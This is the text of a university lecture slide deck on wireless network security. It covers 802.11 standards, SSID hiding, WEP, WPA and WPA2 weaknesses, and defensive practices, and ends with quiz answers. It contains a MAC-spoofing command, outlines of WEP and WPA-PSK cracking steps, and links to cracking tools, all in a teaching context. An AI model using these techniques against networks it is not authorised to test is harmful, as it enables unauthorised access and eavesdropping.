5169 wireless network_security_amine_k

Wireless Network Security

Wireless Networks and Mobile Computing (CSI 5169)

A mine Khalife
akhal0 1 6 @ uo ttawa. ca

Outline

1. Wireless intro & history

2. Wireless network modes

3. SSID

4. WEP

5. WPA

6. WPA2

7. Wireless Network tools

8. References


Background & Overview
 History
 Developed for military use
 Security widely noticed after Peter Shipley’s 2001 DefCon
preso on War Driving
 DHS labeled Wi-Fi a terrorist threat, demanded regulation
 Non Wi-Fi types
 CDPD – 19.2 kbps analog
 GPRS – 171.2 kbps digital
 WAP – bandwidth-efficient content delivery
 Ricochet – 176 kbps wireless broadband flop
 Bluetooth – personal area networks, range limited only by
transmit power
 Blackberry – Use cellular & PCS networks, no
authentication at console
 IEEE 802 series standards
 802.11 – wireless LANs
 802.15 – wireless personal area networks (e.g., Bluetooth)
 802.16 – wireless broadband up to 155Mb, wireless ISPs


802.11 Standards

 802.11a – 54 Mbps@5 GHz
 Not interoperable with 802.11b
 Limited distance
 Dual-mode APs require 2 chipsets, look like two APs to
clients
 Cisco products: Aironet 1200
 802.11b – 11 Mbps@2.4 GHz
 Full speed up to 300 feet
 Coverage up to 1750 feet
 Cisco products: Aironet 340, 350, 1100, 1200
 802.11g – 54 Mbps@2.4 GHz
 Same range as 802.11b
 Backward-compatible with 802.11b
 Speeds slower in dual-mode
 Cisco products: Aironet 1100, 1200


802.11 Standards (Cont.)

 802.11e – QoS
 Dubbed “Wireless MultiMedia (WMM)” by Wi-Fi Alliance
 802.11i – Security
 Adds AES encryption
 Requires high cpu, new chips required
 TKIP is interim solution
 802.11n –(2009)
 up to 300Mbps
 5Ghz and/or 2.4Ghz
 ~230ft range
 802.11ac – (under development)
 Will provide high through put in the 5 GHz band
 Will use wider RF bandwidth
 will enable multi-station WLAN throughput of at least 1
Gbps
 a maximum single link throughput of at least 500 Mbps


Wireless Network Modes

 The 802.11 wireless networks operate in two basic
modes:
1. Infrastructure mode
2. Ad-hoc mode

 Infrastructure mode:
 each wireless client connects directly to a central
device called Access Point (AP)
 no direct connection between wireless clients
 AP acts as a wireless hub that performs the
connections and handles them between wireless
clients


Wireless Network Modes (cont’d)

 The hub handles:
 the clients’ authentication,
 Authorization
 link-level data security (access control and
enabling data traffic encryption)
 Ad-hoc mode:
 Each wireless client connects directly with each other
 No central device managing the connections
 Rapid deployment of a temporal network where no
infrastructures exist (advantage in case of disaster…)
 Each node must maintain its proper authentication
list


SSID – Service Set Identification

 Identifies a particular wireless network
 A client must set the same SSID as the one in that
particular AP Point to join the network
 Without SSID, the client won’t be able to select and join
a wireless network
 Hiding SSID is not a security measure because the
wireless network in this case is not invisible
 It can be defeated by intruders by sniffing it from any
probe signal containing it.


SSID (Cont’d)

 A way for vendors to make more money
 So easy to find the ID for a “hidden” network because
the beacon broadcasting cannot be turned off
 Simply use a utility to show all the current networks:
 inSSIDer
 NetStumbler
 Kismet


IEEE 802.11 Security – Access control list

 Access control list
 Simplest security measure
 Filtering out unknown users
 Requires a list of authorized clients’ MAC addresses to
be loaded in the AP
 Won’t protect each wireless client nor the traffic
confidentiality and integrity ===>vulnerable
 Defeated by MAC spoofing:
 ifconfig eth0 hw ether 00:01:02:03:04:05 (Linux)
 SMAC - KLC Consulting (Windows)
 MAC Makeup - H&C Works (Windows)


WEP - Wired Equivalent Privacy

 The original native security mechanism for WLAN
 provide security through a 802.11 network
 Used to protect wireless communication from eavesdropping
(confidentiality)
 Prevent unauthorized access to a wireless network (access
control)
 Prevent tampering with transmitted messages
 Provide users with the equivalent level of privacy inbuilt in
wireless networks.


WEP

1. Appends a 32-bit CRC checksum to each outgoing frame
(INTEGRITY)

2. Encrypts the frame using RC4 stream cipher = 40-bit
(standard) or 104-bit (Enhanced) message keys + a 24-bit IV
random initialization vector (CONFIDENTIALITY).

3. The Initialization Vector (IV) and default key on the station
access point are used to create a key stream

4. The key stream is then used to convert the plain text message
into the WEP encrypted frame.


Encrypted WEP frame


RC4 keystream XORed with plaintext


WEP Components

 Initialization Vector IV
 Dynamic 24-bit value
 Chosen randomly by the transmitter wireless network
interface
 16.7 million possible keys (224)

 Shared Secret Key
 40 bits long (5 ASCII characters) when 64 bit key is used
 104 bits long (13 ASCII characters) when 128 bit key is used


WEP Components (cont’d)

 RC4 algorithm consists of 2 main parts:

1. The Key Scheduling Algorithm (KSA):
 involves creating a scrambled state array
 This state array will now be used as input in the
second phase, called the PRGA phase.

1. The Pseudo Random Generation Algorithm(PRGA):
 The state array from the KSA process is used here to
generate a final key stream.
 Each byte of the key stream generated is then Xor’ed
with the corresponding plain text byte to produce the
desired cipher text.


WEP Components (cont’d)

 ICV (Integrity Check Value)= CRC32 (cyclic redundancy
check) integrity check

 XOR operation
 denoted as ⊕
 plain-text ⊕ keystream= cipher-text
 cipher-text ⊕ keystream= plain-text
 plain-text ⊕ cipher-text= keystream


How WEP works

IV original unencrypted packet checksum

RC4
key

IV encrypted packet


Encryption Process


Decryption Process


WEP Authentication

1. The station sends an authentication request to AP
2. AP sends challenge text to the station.
3. The station uses its configured 64-bit or 128-bit default key to
encrypt the challenge text, and it sends the latter to AP.
4. AP decrypts the encrypted text using its configured WEP key
that corresponds to the station's default key.
5. AP compares the decrypted text with the original challenge
text.
6. If the decrypted text matches the original challenge text, then
the access point and the station share the same WEP key, and
the access point authenticates the station.
7. The station connects to the network.


WEP Authentication (Cont’d)


WEP Authentication (Cont’d)

 There is a well-documented vulnerability with shared-
key authentication.
 The authentication process leaks information about
the key stream
 It is possible to derive the keystream used for the handshake by
capturing the challenge frames in Shared Key authentication.
 SKA is regarded as insecure.
 The problem is that a monitoring attacker can observe both the
challenge and the encrypted response.
 he can determine the RC4 stream used to encrypt the
response,
 He can use that stream to encrypt any challenge he
receives in the future


WEP flaws and vulnerabilities

 Weak keys:
 It allows an attacker to discover the default key
being used by the Access Point and client stations
 This enables an attacker to decrypt all messages
being sent over the encrypted channel.
 IV reuse and small size:
 There are 224 different IVs
 On a busy network, the IV will surely be reused, if
the default key has not been changed and the
original message can be retrieved relatively easily.


WEP flaws and vulnerabilities (cont’d)

 With IV reuse, it is possible to determine keystreams
and hence enable an attacker to forge packets
obtaining access to the WLAN.
 If WEP is using 40 bit long key then it will need more
protection from attacks as compared to 128 bit long
WEP key. Hence, both are very weak and unable to
provide the security to Wi-Fi Networks.
 uses weak authentication algorithm
 uses weak data encapsulation method
 The use of improper integrity algorithm i.e. CRC-32
 Lack of mutual authentication and key management


Attacks on WEP

WEP encrypted networks can be cracked in 10 minutes

Goal is to collect enough IVs to be able to crack the key

IV = Initialization Vector, plaintext appended to the key to
avoid Repetition

Injecting packets generates IVs


Attacks on WEP

 Backtrack 5 (Released 1st March 2012)

 Tutorial is available

 All required tools on a Linux
bootable CD + laptop +
wireless card


WEP cracking example


WPA - WI-FI Protected Access

 New technique in 2002
 replacement of security flaws of WEP.
 Improved data encryption
 Strong user authentication
 Because of many attacks related to static key, WPA
minimize shared secret key in accordance with the
frame transmission.
 Use the RC4 algorithm in a proper way and provide fast
transfer of the data before someone can decrypt the
data.


WPA

 Data is encrypted using the RC4 stream cipher, with a
128-bit key and a 48-bit initialization vector (IV).
 One major improvement in WPA over WEP is the
Temporal Key Integrity Protocol (TKIP), which
dynamically changes keys as the system is used.
 When combined with the much larger IV, this defeats
the well-known key recovery attacks on WEP.
 WPA also provides vastly improved payload integrity.


WPA

 A more secure message authentication code (usually
known as a MAC, but here termed a MIC for "Message
Integrity Code") is used in WPA, an algorithm named
"Michael".
 The MIC used in WPA includes a frame counter, which
prevents replay attacks being executed.
 The Michael algorithm is a strong algorithm that would
still work with most older network cards.
 WPA includes a special countermeasure mechanism that
detects an attempt to break TKIP and temporarily
blocks communications with the attacker.


WPA


How WPA Addresses the WEP Vulnerabilities

 WPA wraps RC4 cipher engine in four new algorithms
1. Extended 48-bit IV and IV Sequencing Rules
 248 is a large number! More than 500 trillion
 Sequencing rules specify how IVs are selected and
verified
2. A Message Integrity Code (MIC) called Michael
 Designed for deployed hardware
 Requires use of active countermeasures
3. Key Derivation and Distribution
 Initial random number exchanges defeat man-in-the-
middle attacks
4. Temporal Key Integrity Protocol generates per-
packet keys


WPA2 - WI-FI Protected Access 2

 Based on the IEEE 802.i standard
 2 versions: Personal & Enterprise
 The primary enhancement over WPA is the use of the
AES (Advanced Encryption Standard) algorithm
 The encryption in WPA2 is done by utilizing either
AES or TKIP
 The Personal mode uses a PSK (Pre-shared key) &
does not require a separate authentication of users
 The enterprise mode requires the users to be
separately authenticated by using the EAP protocol


WPA2

 WPA uses AES with a key length of 128 bit to encrypt
the data

 The AES uses the Counter-Mode/CBC-MAC Protocol
(CCMP)

 The CCMP uses the same key for both encryption and
authentication, but with different initialization vectors.


WPA2

 WPA2 has immunity against many types of hacker
attacks
 Man-in-the middle
 Authentication forging
 Replay
 Key collision
 Weak keys
 Packet forging
 Dictionary attacks


WPA2 weaknesses

 Can’t protect against layer session hijacking

 Can’t stand in front of the physical layer attacks:
 RF jamming
 Data flooding
 Access points failure

 Vulnerable to the Mac addresses spoofing


Am I secure if I use WPA-PSK

 WPA-PSK protected networks are vulnerable to dictionary
attacks
 Works with WPA & WPA2 (802.11i)
 New attack techniques have increased the speed of this attack
– CowPatty 4.6
 Run CowPatty against packets to crack the key
 Needs SSID to crack the WPA-PSK, easily obtainable!
 Also supports WPA2-PSK cracking with the same pre-
computed tables!
 Spoof the Mac address of the AP and tell client to disassociate
 Sniff the wireless network for the WPA-PSK handshake (EAPOL)


WPA Cracking Example


WEP vs WPA vs WPA2

WEP WPA WPA2

ENCRYPTION RC4 RC4 AES
KEY ROTATION NONE Dynamic Dynamic Session
Session Keys Keys
KEY Manually typed Automatic Automatic
DISTRIBUTION into each device distribution distribution
available available
AUTHENTICATIO Uses WEP key as Can use 802.1x Can use 802.1x
N Authentication & EAP & EAP


Procedures to improve wireless security

 Use wireless intrusion prevention system (WIPS)
 Enable WPA-PSK
 Use a good passphrase (https://grc.com/password)
 Use WPA2 where possible
 AES is more secure, use TKIP for better performance
 Change your SSID every so often
 Wireless network users should use or upgrade their
network to the latest security standard released


Wireless Network tools

 MAC Spoofing
 http://aspoof.sourceforge.net/
 http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp
 http://www.klcconsulting.net/smac/
 WEP Cracking tools
 http://www.backtrack-linux.org/
 http://www.remote-exploit.org/articles/backtrack/index.html
 http://wepattack.sourceforge.net/
 http://wepcrack.sourceforge.net/
 Wireless Analysers
 http://www.kismetwireless.net/
 http://www.netstumbler.com/


Questions

Q1) Given the cipher-text: 11010110 and the plaintext: 00110101.
Compute the keystream.

A1) cipher-text: 1 1 0 1 0 1 1 0

plain-text: 0 0 1 1 0 1 0 1

keystream: 1 1 1 0 0 0 1 1

Encrypting: plain-text keystream = cipher-text

Decrypting: cipher-text keystream = plain-text


Questions (Cont’d)

Q2) Why SSID hiding or disabling technique is not an
100% effective?

A2) The beacon broadcasting cannot be turned off and
hackers can still detect the SSID by sniffing different
messages using hacking tools.


Questions(Cont’d)

Q3) List 4 WEP vulnerabilities

A3)
1. The Initialization Vector (IV) is Too Small
2. The Integrity Check Value (ICV) algorithm is not
appropriate
3. WEP’s use of RC4 is weak
4. Authentication Messages can be easily forged


REFERENCES

1. Hytnen, R., and Garcia, M. An Analysis of Wireless Security.
2006
2. Whalen, S. Analysis of WEP and RC4 Algorithms. March 2002
3. http://en.wikipedia.org/wiki/IEEE_802.1X
4. Wireless LAN Medium Access Control and Physical Layer
Specifications. IEEE Std 802.11. June 2007
5. http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
6. http://en.wikipedia.org/wiki/Advanced_Encryption_Standard


Thank You!
Questions?


5169 wireless network_security_amine_k

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (20)

En vedette

En vedette (14)

Similaire à 5169 wireless network_security_amine_k

Similaire à 5169 wireless network_security_amine_k (20)

5169 wireless network_security_amine_k